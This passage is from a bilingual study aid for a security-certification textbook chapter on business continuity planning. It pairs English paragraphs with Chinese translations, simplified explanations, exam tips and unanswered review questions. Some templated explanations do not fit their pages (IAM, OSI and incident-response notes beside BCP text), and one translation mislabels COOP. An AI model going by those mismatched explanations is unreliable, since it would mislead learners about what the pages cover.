Statement of Organizational Responsibility The statement of organizational responsibility also comes from a senior-level executive and can be incorporated into the same letter as the statement of importance. It echoes the sentiment that “business continuity is everyone's responsibility.” The statement of organizational responsibility restates the organization's commitment to business continuity planning. It informs employees, vendors, and affiliates that the organization expects them to do everything they can to assist with the BCP process.

Statement of Urgency and Timing The statement of urgency and timing expresses the criticality of implementing the BCP and outlines the implementation timetable decided on by the BCP team and agreed to by upper management. The wording of this statement will depend on the actual urgency assigned to the BCP process by your organization's leadership. Consider including a detailed implementation timeline to foster a sense of urgency. Risk Assessment The risk assessment portion of the BCP documentation essentially recaps the decision-making process undertaken during the business impact analysis.

It should include a discussion of all the critical business functions considered during the BIA as well as the quantitative and qualitative analyses performed to assess the risks to those functions. Include the actual AV, EF, ARO, SLE, and ALE figures in the quantitative analysis. Also, describe the thought process behind the analysis to the reader. Finally, keep in mind that the assessment reflects a point-in-time evaluation, and the team must update it regularly to reflect changing conditions.

中文直译 / 整理

优先事项声明直接源于业务影响分析中的优先事项识别阶段。 它仅涉及按优先 级顺序列出被认为对持续业务运营至关重要的职能。 在列出这些优先事项时, 还应说明它们是在BCP过程中制定的,并反映了在紧急情况下这些职能对持续 业务运营的重要性,仅此而已。 否则,优先事项列表可能被用于非预期目的, 并导致各组织之间为争夺地盘而发生政治冲突,从而损害业务连续性计划。 组织责任声明 组织责任声明也来自高级管理人员,可以与重要性声明合并到同一封信中。 它 呼应了“业务连续性是每个人的责任”这一理念。 组织责任声明重申了组织对 业务连续性规划的承诺,告知员工、供应商和关联方,组织期望他们尽一切努 力协助BCP流程。 紧迫性与时间安排声明 紧迫性与时间安排声明阐述了实施BCP的必要性,并概述了BCP团队制定并经 高层管理批准的实施时间表。 该声明的措辞将取决于贵组织领导层对BCP流程 所赋予的实际紧迫性。 建议包含详细的实施时间表,以增强紧迫感。 风险评估 BCP文档中的风险评估部分基本上是对业务影响分析过程中所采取的决策过程 的回顾。 它应涵盖BIA期间所考虑的所有关键业务功能,以及为评估这些功能 所面临风险而进行的定量和定性分析。

在定量分析中,请包含实际的AV、EF、 ARO、SLE和ALE数值。 同时,向读者说明分析背后的思考过程。 最后,请记 住,该评估反映的是某一时间点的评价,团队必须定期更新以反映变化的状况。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 261 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 30 / PDF P262

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Risk Acceptance/Mitigation The risk acceptance/mitigation section of the BCP documentation contains the outcome of the strategy development portion of the BCP process. It should cover each risk identified in the risk analysis portion of the document and outline one of two thought processes: For risks that were deemed acceptable, it should outline the reasons the risk was considered acceptable as well as potential future events that might warrant a reconsideration of this determination. For risks that were deemed unacceptable, it should outline the risk management provisions and processes put into place to reduce the risk to the organization's continued viability.

It's far too easy to look at a difficult risk mitigation challenge and say, “We accept this risk” before moving on to less difficult things. Business continuity planners should resist these statements and ask business leaders to document their risk acceptance decisions formally. If auditors later scrutinize your business continuity plan, they will most certainly look for formal artifacts of any risk acceptance decisions made in the BCP process. Vital Records Program The BCP documentation should also outline a vital records program for the organization. This document states where critical business records will be stored and the procedures for making and storing backup copies of those records.

One of the biggest challenges in implementing a vital records program is often identifying the essential records in the first place. As many organizations transitioned from paper-based to digital workflows, they often lost the rigor that existed around creating and maintaining formal file structures. Vital records may now be distributed among a wide variety of IT systems and cloud services. Some may be stored on central servers accessible to groups, whereas others may be located in digital repositories assigned to an individual employee.

中文直译 / 整理

风险接受/缓解 BCP文档中的风险接受/缓解部分包含了BCP流程中策略制定部分的结果。 它 应涵盖文档风险分析部分所识别的每一项风险,并阐述以下两种思考过程之一: 对于被认定为可接受的风险,应说明认为该风险可接受的原因,以及可能 促使重新评估此决定的未来潜在事件。 对于被认定为不可接受的风险,应说明为降低风险以保障组织持续运营而 实施的风险管理措施和流程。 面对困难的风险缓解挑战时,人们很容易轻易地说“我们接受此风险”, 然后转而处理更简单的事情。 业务连续性规划人员应抵制此类说法,并要 求业务领导者正式记录其风险接受决策。 如果审计人员日后审查您的业务 连续性计划,他们肯定会查找BCP过程中任何风险接受决策的正式证据。 重要记录计划 业务连续性计划文档还应说明组织的重要记录计划。 该文件应明确关键业务 记录的存储位置,以及制作和存储这些记录备份的程序。 在实施重要记录计划时,最大的挑战之一往往是首先识别出关键记录。 随着许 多组织从纸质流程过渡到数字化流程,他们往往失去了在创建和维护正式文件 结构方面原有的严谨性。 如今,重要记录可能分散在各种IT系统和云服务中。

有些存储在可供团队访问的中央服务器上,而另一些则可能位于分配给个别员 工的数字存储库中。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 31 / PDF P263

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

If that messy state of affairs sounds like your current reality, you may want to begin your vital records program by identifying the records that are truly critical to your business. Sit down with functional leaders and ask, “If we needed to rebuild our organization today in a completely new location without access to any of our computers or files, what records would you need?” Asking the question in this way forces the team to visualize the actual process of re-creating operations and, as they walk through the steps in their minds, will produce an inventory of the organization's vital records.

This inventory may evolve as people remember other important information sources, so you should consider using multiple conversations to finalize it. Once you've identified the records that your organization considers vital, the next task is a formidable one: find them. You should be able to identify the storage locations for each document identified in your vital records inventory. Once you've completed this task, you can then use this vital records inventory to inform the rest of your business continuity planning efforts. Emergency Response Guidelines The emergency response guidelines outline the organizational and individual responsibilities for immediate response to an emergency.

This document provides the first employees to detect an emergency with the steps they should take to activate provisions of the BCP that do not start automatically.

This documentation should include the following: Immediate response procedures (security and safety procedures, fire suppression procedures, notification of appropriate emergency-response agencies, etc.) A list of the individuals to notify of the incident (executives, BCP team members, etc.) Secondary response procedures that first responders should follow while waiting for the BCP team to assemble Your documentation should be easily accessible to everyone in the organization who may be among the first responders to a crisis incident. Any time a disruption strikes, time is of the essence.

Slowdowns in activating your business continuity procedures may result in undesirable downtime for your business operations. Maintenance

中文直译 / 整理

如果这种混乱的状况听起来像你当前的现实,你可能希望从识别对业务真正至 关重要的记录开始你的重要记录计划。 与各职能负责人坐下来,问他们:"如果 我们今天需要在完全新的地点重建整个组织,且无法访问任何计算机或文件, 你需要哪些记录? " 以这种方式提问,迫使团队想象重新建立运营的实际过程; 当他们在脑海中逐步推演这些步骤时,便会列出组织的重要记录清单。 随着人 们回忆起其他重要的信息来源,这份清单可能会不断演变,因此建议通过多次 对话来最终确定它。 一旦您确定了贵组织认为至关重要的记录,下一步任务就非常艰巨了:找到它 们。 您应该能够确定您在关键记录清单中识别出的每个文档的存储位置。 完成 此任务后,您便可利用此关键记录清单来指导其余的业务连续性规划工作。 应急响应指南 应急响应指南概述了组织和个人在应对紧急情况时的即时职责。 本文件为首位 发现紧急情况的员工提供了应采取的步骤,以启动那些不会自动启动的业务连 续性计划(BCP)条款。

此文档应包括以下内容: 即时响应程序(安全与防护程序、火灾扑救程序、通知相关应急响应机构 等) 需通知的人员名单(高管、BCP团队成员等) 初级响应人员在等待BCP团队集结期间应遵循的二级响应程序 您的文档应便于所有人访问 可能成为危机事件首批响应者的组织。 任何中断发生时,时间都至关重要。 业 务连续性程序启动缓慢可能导致业务运营出现不必要的停机。 维护

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 32 / PDF P264

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

The BCP documentation and the plan itself must be living documents. Every organization encounters nearly constant change, and this dynamic nature ensures that the business's continuity requirements will also evolve. The BCP team should not disband after the plan is developed but should still meet periodically to discuss the plan and review the results of plan tests to ensure that it continues to meet organizational needs. Minor changes to the plan do not require conducting the full BCP development process from scratch; the BCP team may make them at an informal meeting by unanimous consent.

However, keep in mind that drastic changes in an organization's mission or resources may require going back to the BCP drawing board and beginning again. Any time you make a change to the BCP, you must practice reasonable version control. All older versions of the BCP should be physically destroyed and replaced by the most current version so that no confusion exists as to the correct implementation of the BCP. It is also a good practice to include BCP components in job descriptions to ensure that the BCP remains fresh and to increase the likelihood that team members carry out their BCP responsibilities correctly.

Including BCP responsibilities in an employee's job description also makes them fair game for the performance review process. Testing and Exercises The BCP documentation should also outline a formalized exercise program to ensure that the plan remains current. Exercises also verify that team members receive adequate training to perform their duties in the event of a disaster. The testing process is quite similar to that used for the disaster recovery plan, so we'll reserve the discussion of the specific test types for Chapter 18.

Summary Every organization dependent on technological resources for its survival should have a comprehensive business continuity plan in place to ensure the sustained viability of the organization when emergencies take place. Several important concepts underlie solid business continuity planning practices, including project scope and planning, business impact analysis, continuity planning, and approval and implementation.

中文直译 / 整理

业务连续性计划(BCP)文档及其计划本身必须是动态更新的文件。 每个组织 都面临几乎持续不断的变化,这种动态性确保了业务的连续性需求也会随之演 变。 BCP团队在计划制定后不应解散,而应定期召开会议,讨论计划内容并审 查计划测试结果,以确保其持续满足组织需求。 对计划的微小调整无需从头开始执行完整的BCP开发流程; BCP团队可通过非 正式会议以一致同意的方式进行这些调整。 但请注意,组织使命或资源的重大 变化可能需要回到BCP的初始阶段并重新开始。 每次对BCP进行修改时,都必须实行合理版本控制。 所有旧版本的BCP都应物 理销毁,并由最新版本替代,以确保不存在关于BCP正确实施的任何混淆。 将BCP组件纳入职位描述也是一种良好实践,以确保BCP保持时效性,并提 高团队成员正确履行BCP职责的可能性。 将BCP职责纳入员工的职位描述, 也有助于使其成为绩效评估过程中的合理内容。 测试与演练 BCP文档还应概述一个正式的演练计划,以确保计划保持最新。 演练还可验证 团队成员是否接受了充分的培训,以便在灾难发生时履行其职责。 测试过程与 灾难恢复计划所使用的过程非常相似,因此我们将把具体测试类型的讨论保留 至第18章。

摘要 每个依赖技术资源生存的组织都应制定全面的业务连续性计划,以确保在紧急 情况下组织的持续生存能力。 坚实的业务连续性规划实践基于若干重要概念, 包括项目范围与规划、业务影响分析、连续性规划以及审批与实施。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 33 / PDF P265

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Every organization must have plans and procedures in place to help mitigate the effects a disaster can have on continuing operations and to accelerate the return to normal operations. To determine the risks to your critical business functions that require mitigation, you must work with a cross-functional team to conduct a business impact analysis from both quantitative and qualitative points of view. You must take the appropriate steps in developing a continuity strategy for your organization and know what to do to weather future disasters. Finally, you must create the documentation required to ensure the effective communication of your plan to current and future BCP team participants.

Such documentation should include the continuity of operations plan (COOP). The business continuity plan must also contain statements of importance, priorities, organizational responsibility, and timing. Also, the documentation should include plans for risk assessment, acceptance, and mitigation; a vital records program; emergency-response guidelines; and procedures for maintenance and testing. Chapter 18 will take this planning to the next step—developing and implementing a disaster recovery plan that includes the technical controls required to keep your business running in the face of a disaster. Study Essentials Understand the four steps of the business continuity planning process.

Business continuity planning involves four distinct elements: project scope and planning, business impact analysis, continuity planning, and approval and implementation. Each element contributes to the overall goal of ensuring that business operations continue uninterrupted in the face of an emergency. Describe how to perform the business organization analysis. In the business organization analysis, the individuals responsible for leading the BCP process determine which departments and individuals have a stake in the business continuity plan.

This analysis serves as the foundation for BCP team selection and, after validation by the BCP team, is used to guide the next stages of BCP development. List the necessary members of the business continuity planning team. The BCP team should contain, at a minimum, representatives from each of the operational and support departments; technical experts from the

中文直译 / 整理

每个组织都必须制定计划和程序,以帮助减轻灾难对持续运营的影响,并加速 恢复正常运营。 为了确定需要缓解的关键业务功能所面临的风险,您必须与跨 职能团队合作,从定量和定性两个角度开展业务影响分析。 您必须在制定组织 的连续性策略时采取适当措施,并了解如何应对未来的灾难。 最后,您必须创建必要的文档,以确保向当前和未来的BCP团队成员有效传 达您的计划。 此类文档应包括业务连续性计划(COOP)。 业务连续性计划 还必须包含重要性声明、优先级、组织责任和时间安排。 此外,文档还应包 括风险评估、接受和缓解计划; 关键记录程序; 应急响应指南; 以及维护和 测试程序。 第18章将把这一规划提升到下一步——制定并实施灾难恢复计划,其中包含 在灾难发生时维持业务运转所需的技术控制措施。 学习要点 理解业务连续性规划过程的四个步骤。 业务连续性规划包括四个不同要素:项 目范围与规划、业务影响分析、连续性规划以及批准与实施。 每个要素都有助 于实现整体目标,即在紧急情况下确保业务运营持续不间断。 描述如何进行业务组织分析。 在业务组织分析中,负责领导BCP过程的人员确定 哪些部门和个人与业务连续性计划相关。

此分析是BCP团队选择的基础,并在经 BCP团队验证后,用于指导BCP开发的后续阶段。 列出业务连续性规划团队的必要成员。 BCP团队应至少包括来自每个运营和支持部门的代表; 来自IT部 门的技术专家; 具备BCP技能的物理和IT安全人员; 熟悉公司法律、监管和合同责任的法律代表; 人力 资源成员; 公共关系成员; 以及高级管理层的代表。 其他团队成员取决于组织的结构和性质。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 34 / PDF P266

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

IT department; physical and IT security personnel with BCP skills; legal representatives familiar with corporate legal, regulatory, and contractual responsibilities; human resources members; public relations members; and representatives from senior management. Additional team members depend on the structure and nature of the organization. Know the legal and regulatory requirements that face business continuity planners. Business leaders must exercise due diligence to ensure that shareholders' interests are protected in the event disaster strikes. Some industries are also subject to federal, state, and local regulations that mandate specific BCP procedures.

Many businesses also have contractual obligations to their clients that they must meet before, during, and after a disaster. Explain the stages of the business impact analysis process. The five stages of the business impact analysis process are identifying priorities, risk identification, likelihood assessment, impact analysis, and resource prioritization. Describe the process used to develop a continuity strategy. During the strategy development subtask, the BCP team determines which risks they will mitigate. In the provisions and processes subtask, the team designs mechanisms and procedures that will mitigate identified risks.

The plan must then be approved by senior management and implemented. Personnel must also receive training on their roles in the BCP process. Explain the importance of comprehensively documenting an organization's business continuity plan. Committing the plan to writing provides the organization with a written record of the procedures to follow when disaster strikes. It prevents the “it's in my head” syndrome and ensures the orderly progress of events in an emergency. Written Lab 1. Why is it essential to include legal representatives on your business continuity planning team? 2. What is wrong with the “seat-of-the-pants” approach to business continuity planning? 3.

What is the difference between quantitative and qualitative assessment? IT

中文直译 / 整理

部门; 具备BCP技能的物理和IT安全人员; 熟悉公司法律、监管和合同责 任的法律代表; 人力资源成员; 公共关系成员; 以及高级管理层的代表。 其他 团队成员取决于组织的结构和性质。 了解业务连续性规划者面临的法律和监管要求。 业务领导者必须尽职尽责,以确 保在灾难发生时股东的利益得到保护。 某些行业还受到联邦、州和地方法规的约 束,这些法规强制要求特定的业务连续性计划(BCP)程序。 许多企业还对其客 户负有合同义务,必须在灾难发生前、发生时和发生后履行这些义务。 解释业务影响分析过程的各个阶段。 业务影响分析过程的五个阶段包括确定优先 级、风险识别、可能性评估、影响分析和资源优先级排序。 描述制定连续性策略的过程。 在策略制定子任务中,BCP团队确定将要缓解的风 险。 在措施与流程子任务中,团队设计用于缓解已识别风险的机制和程序。 该计 划必须经过高级管理层批准并实施。 人员还必须接受关于其在BCP过程中角色的 培训。 解释全面记录组织业务连续性计划的重要性。 将计划书面化为组织提供了在灾 难发生时应遵循程序的书面记录。 它避免了“只存在于脑海中”的情况,并确 保在紧急情况下事件能够有序进行。

书面实验 1. 为什么在业务连续性规划团队中包含法律代表至关重要? 2. “凭直觉”的业务连续性规划方法有何问题? 3. 定量评估与定性评估有何区别?

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 35 / PDF P267

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

4. What critical components should you include in your business continuity training plan? 5. What are the four main elements of the business continuity planning process? Review Questions 1. James was recently asked by his organization's CIO to lead a core team of four experts through a business continuity planning process for his organization. What is the first step that this core team should undertake? A. BCP team selection B. Business organization analysis C. Resource requirements analysis D. Legal and regulatory assessment 2.

Tracy is preparing for her organization's annual business continuity exercise and encounters resistance from some managers who don't see the exercise as important and feel that it is a waste of resources. She has already told the managers that it will only take half a day for their employees to participate. What argument could Tracy make to best address these concerns? A. The exercise is required by policy. B. The exercise is already scheduled and canceling it would be difficult. C. The exercise is crucial to ensuring that the organization is prepared for emergencies. D. The exercise will not be very time-consuming. 3.

The board of directors of Clashmore Circuits conducts an annual review of the business continuity planning process to ensure that adequate measures are in place to minimize the effect of a disaster on the organization's continued viability. What obligation are they satisfying by this review? A. Corporate responsibility B. Disaster requirement C. Due diligence 4.

中文直译 / 整理

在您的业务连续性培训计划中,应包含哪些关键组成部分? 5. 业务连续性规划过程的四个主要要素是什么? 复习问题 1. 詹姆斯最近被其组织的首席信息官任命,领导一个由四位专家组成的核心团队, 为其组织开展业务连续性规划过程。 这个核心团队应首先采取什么步骤? A. BCP团队选择 B. 业务组织分析 C. 资源需求分析 D. 法律与监管评估 2. 特蕾西正在为她所在组织的年度业务连续性演练做准备,但遇到一些经理 的抵触,他们认为该演练并不重要,觉得是资源浪费。 她已经告诉这些经理, 他们的员工只需花费半天时间参与。 特蕾西可以提出什么论点来最好地解决 这些担忧? A. 该演练是政策要求的。 B. 该演练已安排好,取消会很困难。 C. 该演练对于确保组织为紧急情况做好准备至关重要。 D. 该练习不会耗费太多时间。 3. Clashmore Circuits董事会每年对业务连续性规划流程进行审查,以确 保采取了充分的措施,最大限度地减少灾难对组织持续生存能力的影响。 通 过这一审查,他们履行了何种义务? A. 企业责任 B. 灾难要求 C. 尽职调查

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

政策:政策是高层原则,说明必须遵守什么。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 36 / PDF P268

第 268 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

D. Going concern responsibility 4. Darcy is leading the BCP effort for her organization and is currently in the project scope and planning phase. What should she expect will be the major resource consumed by the BCP process during this phase? A. Hardware B. Software C. Processing time D. Personnel 5. Ryan is assisting with his organization's annual business impact analysis effort. He's been asked to assign quantitative values to assets as part of the priority identification exercise. What unit of measure should he use? A. Monetary B. Utility C. Importance D. Time 6. Renee is reporting the results of her organization's BIA to senior leaders.

They express frustration at all of the detail, and one of them says, “Look, we just need to know how much we should expect these risks to cost us each year.” What measure could Renee provide to best answer this question? A. ARO B. SLE C. ALE D. EF 7. Jake is conducting a business impact analysis for his organization. As part of the process, he asks leaders from different units to provide input on how long the enterprise resource planning (ERP) system could be unavailable without causing irreparable harm to the organization. What measure is he seeking to determine? A. SLE B. EF D.

中文直译 / 整理

持续经营责任 4. 达西正在为其组织领导BCP工作,目前正处于项目范围和规划阶段。 她应 预期在这一阶段中,BCP过程消耗的主要资源是什么? A. 硬件 B. 软件 C. 处理时间 D. 人员 5. 莱恩正在协助其组织的年度业务影响分析工作。 他被要求在优先级识别活 动中为资产分配量化值。 他应使用何种计量单位? A. 货币 B. 实用性 C. 重要性 D. 时间 6. 琳妮正在向高级领导汇报其组织的BIA结果。 他们对所有细节感到沮丧, 其中一人说:"好吧,我们只需要知道这些风险每年预计会给我们带来多少成 本。 " 琳妮应提供什么指标来最好地回答这个问题? A. ARO B. SLE C. ALE D. EF 7. 杰克正在为其组织进行业务影响分析。 作为该过程的一部分,他要求来 自不同部门的负责人提供输入,说明企业资源规划(ERP)系统在多长时间 内不可用不会对组织造成不可修复的损害。 他试图确定的是哪项指标? A. SLE B. EF

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

